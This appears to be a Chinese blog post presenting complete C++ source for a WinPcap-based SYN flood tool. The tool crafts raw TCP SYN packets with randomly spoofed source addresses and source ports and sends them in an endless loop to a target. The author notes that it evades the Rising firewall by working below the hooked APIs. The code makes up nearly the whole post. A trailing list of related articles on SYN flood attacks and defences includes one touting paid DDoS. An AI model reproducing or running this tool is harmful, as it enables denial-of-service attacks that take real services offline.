SYN FLOOD WINCAP

直接绕过瑞星防火墙了

可能是瑞星hook某个函数

wincap直接操作底层，所以瑞星没报

环境什么的和原来的一样

#define WIN32
#define HAVE_REMOTE
#define _XKEYCHECK_H
#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_DEPRECATE 1
#define _CRT_NONSTDC_NO_DEPRECATE 1
#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <winsock2.h>
#include <conio.h>
#include <iostream>
#include <packet32.h>
#include <ntddndis.h>
#include <time.h>
#include <string>
#include <vector>
#include "remote-ext.h"
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"Packet.lib")
using namespace std;
/*                       IP报文格式
0            8           16                        32
+------------+------------+-------------------------+
| ver + hlen |  服务类型  |         总长度          |
+------------+------------+----+--------------------+
|           标识位        |flag|   分片偏移(13位)   |
+------------+------------+----+--------------------+
|  生存时间  | 高层协议号 |       首部校验和        |
+------------+------------+-------------------------+
|                   源 IP 地址                      |
+---------------------------------------------------+
|                  目的 IP 地址                     |
+---------------------------------------------------+*/struct IP_HEADER
{byte versionAndHeader;byte serviceType;byte totalLen[2];byte seqNumber[2];byte flagAndFragPart[2];byte ttl;byte hiProtovolType;byte headerCheckSum[2];byte srcIpAddr[4];byte dstIpAddr[4];
};/*
TCP 报文
0                       16                       32
+------------------------+-------------------------+
|      源端口地址        |      目的端口地址       |
+------------------------+-------------------------+
|                      序列号                      |
+--------------------------------------------------+
|                      确认号                      |
+------+--------+--------+-------------------------+
|HLEN/4| 保留位 |控制位/6|         窗口尺寸        |
+------+--------+--------+-------------------------+
|         校验和         |         应急指针        |
+------------------------+-------------------------+
*/struct TCP_HEADER
{byte srcPort[2];//源端口byte dstPort[2];//目标端口byte seqNumber[4];byte ackNumber[4];byte headLen;byte contrl;byte wndSize[2];byte checkSum[2];byte uragentPtr[2];
};struct PSDTCP_HEADER
{byte srcIpAddr[4];     //Source IP address; 32 bitsbyte dstIpAddr[4];     //Destination IP address; 32 bits byte padding;          //paddingbyte protocol;         //Protocol; 8 bitsbyte tcpLen[2];        //TCP length; 16 bits
};struct ETHERNET_HEADER
{byte dstMacAddr[6];byte srcMacAddr[6];byte ethernetType[2];
};struct DEVS_INFO
{char szDevName[512];char szDevsDescription[512];
};int GetAllDevs(DEVS_INFO devsList[])
{int nDevsNum = 0;pcap_if_t *alldevs;char errbuf[PCAP_ERRBUF_SIZE];if (pcap_findalldevs(&alldevs, errbuf) == -1){return -1;printf("error in pcap_findalldevs_ex: %s\n", errbuf);}for (pcap_if_t *d = alldevs; d != NULL; d = d->next){strcpy(devsList[nDevsNum].szDevName, d->name);strcpy(devsList[nDevsNum].szDevsDescription, d->description);nDevsNum++;}pcap_freealldevs(alldevs);return nDevsNum;
}int GetAdapterMacAddr(char *lpszAdapterName, unsigned char ucMacAddr[])
{LPADAPTER lpAdapter = PacketOpenAdapter(lpszAdapterName);if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)){return -1;}PPACKET_OID_DATA oidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));if (NULL == oidData){PacketCloseAdapter(lpAdapter);return -1;}oidData->Oid = OID_802_3_CURRENT_ADDRESS;oidData->Length = 6;memset(oidData->Data, 0, 6);BOOLEAN  bStatus = PacketRequest(lpAdapter, FALSE, oidData);if (bStatus){for (int i = 0; i < 6; ++i){ucMacAddr[i] = (oidData->Data)[i];}}else{return -1;free(oidData);}free(oidData);PacketCloseAdapter(lpAdapter);return 0;
}char *FormatMacAddr(unsigned char *ucMacAddr, char *szStr)
{szStr[0] = '\0';char str[8];for (int i = 0; i < 6; ++i){sprintf(str, "0x%02x-", ucMacAddr[i]);if (str[2] >= 'a' && str[2] <= 'z'){str[2] = 'A' + str[2] - 'a';}if (str[3] >= 'a' && str[3] <= 'z'){str[3] = 'A' + str[3] - 'a';}strcat(szStr, str);}szStr[strlen(szStr) - 1] = '\0';return szStr;
}char *FormatIpAddr(unsigned uIpAddr, char szIp[])
{IN_ADDR addr;addr.S_un.S_addr = uIpAddr;strcpy(szIp, inet_ntoa(addr));return szIp;
}int GetIpByHost(const char *lpszHost, std::vector<std::string> &ipList)
{WSADATA wsadata;WSAStartup(MAKEWORD(2, 2), &wsadata);hostent *phost = gethostbyname(lpszHost);in_addr addr;char *p = phost->h_addr_list[0];for (int i = 1; NULL != p; i++){memcpy(&addr.S_un.S_addr, p, phost->h_length);ipList.push_back(inet_ntoa(addr));p = phost->h_addr_list[i];}return 0;
}int GetGatewayMacAddr(byte macAddr[])
{byte mac[] = { 0x00, 0x00, 0x5e, 0x00, 0x01, 0x48 };//00-00-5e-00-01-48memcpy(macAddr, mac, 6);return 0;
}void DecodeTcpPacket(const byte *packet)
{TCP_HEADER *pTcpHeader = (TCP_HEADER *)packet;//printf("%d\n", pTcpHeader->contrl);//printf("%d\n", (0x01 << 4) | (0x1 << 1) );if (pTcpHeader->contrl == 18)// (0x01 << 4) | (0x1 << 1) ){printf("收到ack回应");}
}void DecodeIpPacket(const unsigned char *ucPacket)
{IP_HEADER *pIpHeader = (IP_HEADER *)ucPacket;unsigned srcIp = *(unsigned *)pIpHeader->srcIpAddr;unsigned dstIp = *(unsigned *)pIpHeader->dstIpAddr;memcpy(&srcIp, pIpHeader->srcIpAddr, 4);memcpy(&dstIp, pIpHeader->dstIpAddr, 4);char szSrcIp[32], szDstIp[32];FormatIpAddr(srcIp, szSrcIp);FormatIpAddr(dstIp, szDstIp);if (0 != strcmp("10.126.72.37", szDstIp) || 0 != strcmp("112.80.248.73", szSrcIp)) return;if (pIpHeader->hiProtovolType != 0x06) return;DecodeTcpPacket((byte *)(ucPacket + sizeof(IP_HEADER)));//printf("Ip: %s\t%s\n", szSrcIp,szDstIp );}void HandlePacketCallBack(unsigned char *param, const struct pcap_pkthdr* packet_header, const unsigned char *ucCaptureContent)
{ETHERNET_HEADER *pEthHeader = (ETHERNET_HEADER *)ucCaptureContent;if (*((unsigned short *)(pEthHeader->ethernetType)) == htons(0x0800)){ETHERNET_HEADER *pEthHeader = (ETHERNET_HEADER *)ucCaptureContent;unsigned char srcMac[6], dstMac[6];memcpy(srcMac, pEthHeader->srcMacAddr, 6);memcpy(dstMac, pEthHeader->dstMacAddr, 6);char szSrcMac[32], szDstMac[32];FormatMacAddr(srcMac, szSrcMac);FormatMacAddr(dstMac, szDstMac);//printf("MAC: %s\t%s\n", szSrcMac,szDstMac );DecodeIpPacket(ucCaptureContent + sizeof(ETHERNET_HEADER));}return;
}
//校验和
unsigned short CheckSum(unsigned short packet[], int size)
{unsigned long cksum = 0;while (size > 1){cksum += *packet++;size -= sizeof(USHORT);}if (size){cksum += *(UCHAR*)packet;}cksum = (cksum >> 16) + (cksum & 0xFFFF);cksum += (cksum >> 16);return (USHORT)(~cksum);
}
//包，源地址，目标地址，源mac
int EncodeSynPacket(byte packet[], const char *lpszSrcIpAddr, const char *lpszDstIpAddr, byte srcMacAddr[])
{TCP_HEADER tcpHeader;memset(&tcpHeader, 0, sizeof tcpHeader);*(unsigned short *)tcpHeader.srcPort = htons(9999);//源端口*(unsigned short *)tcpHeader.dstPort = htons(8080);//目标端口*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);tcpHeader.headLen = 5 << 4;tcpHeader.contrl = 1 << 1;*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);IP_HEADER ipHeader;memset(&ipHeader, 0, sizeof ipHeader);unsigned char versionAndLen = 0x04;versionAndLen <<= 4;versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度ipHeader.versionAndHeader = versionAndLen;*(unsigned short *)ipHeader.totalLen = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));ipHeader.ttl = 0xFF;ipHeader.hiProtovolType = 0x06;*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr(lpszSrcIpAddr);*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr(lpszDstIpAddr);//*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );byte gatewayMac[] = { 0x00, 0x00, 0x5e, 0x00, 0x01, 0x48 };ETHERNET_HEADER ethHeader;memset(&ethHeader, 0, sizeof ethHeader);memcpy(ethHeader.dstMacAddr, gatewayMac, 6);memcpy(ethHeader.srcMacAddr, srcMacAddr, 6);*(unsigned short *)ethHeader.ethernetType = htons(0x0800);//memset(packet, 0, sizeof packet);memcpy(packet, &ethHeader, sizeof ethHeader);memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);return (sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader);
}int main()
{system("mode con cols=110 lines=20");//dos 分辨率改变DEVS_INFO devsList[64];int nDevsNum = GetAllDevs(devsList);//得到网卡数量if (nDevsNum < 1){printf("Get adapter infomation failed!");exit(0);}int selIndex = 1;//选择网卡号if (nDevsNum == 1){printf("%d  %s\t%s\n", 0 + 1, devsList[0].szDevName, devsList[0].szDevsDescription);printf("Only one adapter");}else{for (int i = 0; i < nDevsNum; ++i){printf("%d  %s\t%s\n", i + 1, devsList[i].szDevName, devsList[i].szDevsDescription);}printf("Input your select adapter index: ");scanf("%d", &selIndex);if (selIndex < 0 || selIndex > nDevsNum + 1){printf("Out of range!\nPress any key to exit...");getch();return 0;}}char szError[PCAP_ERRBUF_SIZE];pcap_t *handle = pcap_open_live(devsList[selIndex - 1].szDevName, 65536, 1, 1000, szError);//获得数据包捕获描述字的函数,取得网卡句柄if (NULL == handle){printf("Open adapter failed!\nPress any key to exit...");getch();return 0;}byte localMacAddr[6];//本机mac地址memset(localMacAddr, 0, sizeof localMacAddr);//设置内存空间if (0 != GetAdapterMacAddr(devsList[selIndex - 1].szDevName, localMacAddr))//保存mac{printf("Get localhost mac addr failed!\nPress any key to exit...");getch();return 0;}std::vector<std::string> ipList;GetIpByHost("www.baidu.com", ipList);ipList[0] = "192.168.1.108";byte packet[1024];int size = EncodeSynPacket(packet, "10.126.72.37", ipList[0].c_str(), localMacAddr);//pcap_sendpacket(handle, packet, size );//return 0;IP_HEADER *pIpHeader = (IP_HEADER *)(packet + sizeof(ETHERNET_HEADER));TCP_HEADER *pTcpHeader = (TCP_HEADER *)(packet + sizeof(ETHERNET_HEADER) + sizeof(IP_HEADER));//*srand(time(0));unsigned short srcPort = 0;//= rand() %0xFFFFFFFF;//源端口unsigned int srcIpAddr = 0;//源ipunsigned int baseIpAddr = ntohl(inet_addr("192.168.0.0"));/*struct PSDTCP_HEADER{byte srcIpAddr[4];     //Source IP address; 32 bitsbyte dstIpAddr[4];     //Destination IP address; 32 bitsbyte padding;          //paddingbyte protocol;         //Protocol; 8 bitsbyte tcpLen[2];        //TCP length; 16 bits} ;*/byte psdPacket[128];//伪造包memset(psdPacket, 0x00, sizeof psdPacket);PSDTCP_HEADER *psdHeader = (PSDTCP_HEADER *)psdPacket;*(unsigned int *)(psdHeader->dstIpAddr) = inet_addr(ipList[0].c_str());*(unsigned int *)(psdHeader->srcIpAddr) = inet_addr("10.126.72.37");*(unsigned short *)(psdHeader->tcpLen) = htons(sizeof(TCP_HEADER));psdHeader->protocol = 0x06;psdHeader->padding = 0x00;memcpy(psdPacket + sizeof(PSDTCP_HEADER), pTcpHeader, sizeof(TCP_HEADER));int count = 0;while (1)// count++ < 200 ){srcPort = rand() % 0xFFFF;unsigned int dstIP = baseIpAddr + rand() % 0xFFFF;srcIpAddr = dstIP;//ntohl(inet_addr(dstIP));//baseIpAddr + rand() % 0xFFFF;*(unsigned int *)(pIpHeader->srcIpAddr) = htonl(srcIpAddr);//假IP*(unsigned short *)(pIpHeader->headerCheckSum) = 0x0000;*(unsigned short *)(pIpHeader->headerCheckSum) = CheckSum((unsigned short *)pIpHeader, sizeof(IP_HEADER));*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);*(unsigned int *)(pTcpHeader->seqNumber) = htonl(rand() % 0xFFFFFF);*(unsigned int *)(((TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER)))->seqNumber) = *(unsigned int *)(pTcpHeader->seqNumber);*(unsigned short *)(pTcpHeader->srcPort) = htons(srcPort);*(unsigned short *)(((TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER)))->srcPort) = htons(srcPort);*(unsigned short *)(pTcpHeader->checkSum) = 0x0000;*(unsigned short *)(pTcpHeader->checkSum) = CheckSum((unsigned short *)psdPacket, sizeof(PSDTCP_HEADER) + sizeof(TCP_HEADER));//system("pause");pcap_sendpacket(handle, packet, size);}if (NULL == handle){printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");return 0;}pcap_loop(handle, -1, HandlePacketCallBack, NULL);pcap_close(handle);return 0;/*TCP_HEADER tcpHeader;memset(&tcpHeader, 0, sizeof tcpHeader );*(unsigned short *)tcpHeader.srcPort = htons(9999);*(unsigned short *)tcpHeader.dstPort = htons(80);*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);tcpHeader.headLen = 5 << 4;tcpHeader.contrl = 1 << 1;*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);PSDTCP_HEADER psdHeader;memset(&psdHeader, 0, sizeof psdHeader);*(unsigned int *)psdHeader.dstIpAddr = inet_addr("112.80.248.73");*(unsigned int *)psdHeader.srcIpAddr = inet_addr("10.126.72.37");psdHeader.protocol = 0x06;*(unsigned short *)psdHeader.tcpLen = htons(sizeof(TCP_HEADER));char data[] = "Hello world";byte psdPacket[1024];memset(psdPacket, 0, sizeof psdPacket);memcpy( psdPacket, &psdHeader, sizeof psdHeader );memcpy( psdPacket + sizeof psdHeader, &tcpHeader, sizeof tcpHeader );memcpy( psdPacket + sizeof psdHeader + sizeof tcpHeader, data, sizeof data );*(unsigned short *)tcpHeader.checkSum = CheckSum( (unsigned short*) psdPacket, sizeof psdHeader + sizeof tcpHeader );IP_HEADER ipHeader;memset( &ipHeader, 0, sizeof ipHeader );unsigned char versionAndLen = 0x04;versionAndLen <<= 4;versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度ipHeader.versionAndHeader = versionAndLen;*(unsigned short *)ipHeader.totalLen = htons( sizeof(IP_HEADER) + sizeof(TCP_HEADER) );ipHeader.ttl = 0xFF;ipHeader.hiProtovolType = 0x06;*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr("10.126.72.37");*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr("112.80.248.73");*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );byte srcMac[] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};//byte srcMac[] = {0x90, 0x2B, 0x34, 0x9A, 0xC2, 0xBB};byte dstMac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};ETHERNET_HEADER ethHeader;memset(&ethHeader, 0, sizeof ethHeader);memcpy(ethHeader.dstMacAddr, dstMac, 6);memcpy(ethHeader.srcMacAddr, srcMac, 6);*(unsigned short *)ethHeader.ethernetType = htons(0x0800);byte packet[1024];memset(packet, 0, sizeof packet);memcpy(packet, &ethHeader, sizeof ethHeader);memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);memcpy(packet + sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader, data, sizeof data );int size = sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader;// + sizeof data;//while ( 1 ){system("pause");//pcap_sendpacket(handle, packet, size );}if ( NULL == handle ){printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");return 0;}pcap_loop( handle, -1, HandlePacketCallBack, NULL );pcap_close(handle);return 0;*/
}

SYN FLOOD WINCAP相关推荐

DDOS SYN Flood攻击、DNS Query Flood， CC攻击简介——ddos攻击打死给钱。限网吧、黄网、博彩，，，好熟悉的感觉有木有...
摘自:https://zhuanlan.zhihu.com/p/22953451 首先我们说说ddos攻击方式,记住一句话,这是一个世界级的难题并没有解决办法只能缓解 DDoS(Distributed ...
如何应対syn flood
syn flood的原理就不介绍了主要总结一下解决方法: 防火墙禁IP 内核参数的调优 Linux内核参数调优主要有下面三个: 增大tcp_max_syn_backlog 减小tcp_synack_ ...
ddos ***之 SYN Flood
SYN Flood是互联网上最经典的DDoS***方式之一,最早出现于1999年左右,雅虎是当时最著名的受害者.SYN Flood***利用了TCP三次握手的缺陷,能够以较小代价使目标服务器无法响应, ...
syn flood dos
TCP/IP协议栈维护一个叫做TCB(Transmission Control Block)的特殊的数据结构,这个数据结构中记录了用于建立TCP连接的信息 (1) local and remote s ...
pythonddos防御_浅谈拒绝服务攻击的原理与防御（7）：用Python和C实现syn flood攻击...
01 前言以前做DDOS的实验都是用python来编写工具的,开始不会编写结构不会算校验和的时候就用scapy写,后来学会了报文结构开始自己构造各种报文,但是用python写成之后虽然是能实现基本功 ...
如何防御syn flood的一些思路！
厦门-志君同学21期群里疑问? syn flood是否无法防御刚看到群里同学问问题,我还在讲课,利用间隙简单给大家点思路吧. 老男孩简单答疑如下: 1.先了解什么是SYN Flood? SYN Fl ...
浅谈iptables防SYN Flood攻击和CC攻击
何为syn flood攻击: SYN Flood是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻 ...
重学TCP协议（10）SYN flood 攻击
1.SYN flood 攻击 SYN Flood(半开放攻击)是一种拒绝服务(DDoS)攻击,其目的是通过消耗所有可用的服务器资源使服务器不可用于合法流量.通过重复发送初始连接请求(SYN)数据包,攻 ...
网络（13）-SYN flood及其应对方法
什么是SYN flood 攻击者伪装大量的IP地址给服务器发送SYN报文,由于伪造的IP地址几乎不可能存在,也就几乎没有设备会给服务器返回任何应答了.因此,服务器将会维持一个庞大的等待列表,不停地重试 ...
TCP/IP：TCP SYN Flood攻击原理与实现
目录三次握手过程 SYN Flood攻击原理 SYN Flood攻击实验 1. 初始化 IP 头部 2. 初始化 TCP 头部 3. 初始化 TCP 伪首部 4. 构建 SYN 包 5. 创建原始套 ...

SYN FLOOD WINCAP

SYN FLOOD WINCAP相关推荐

最新文章

热门文章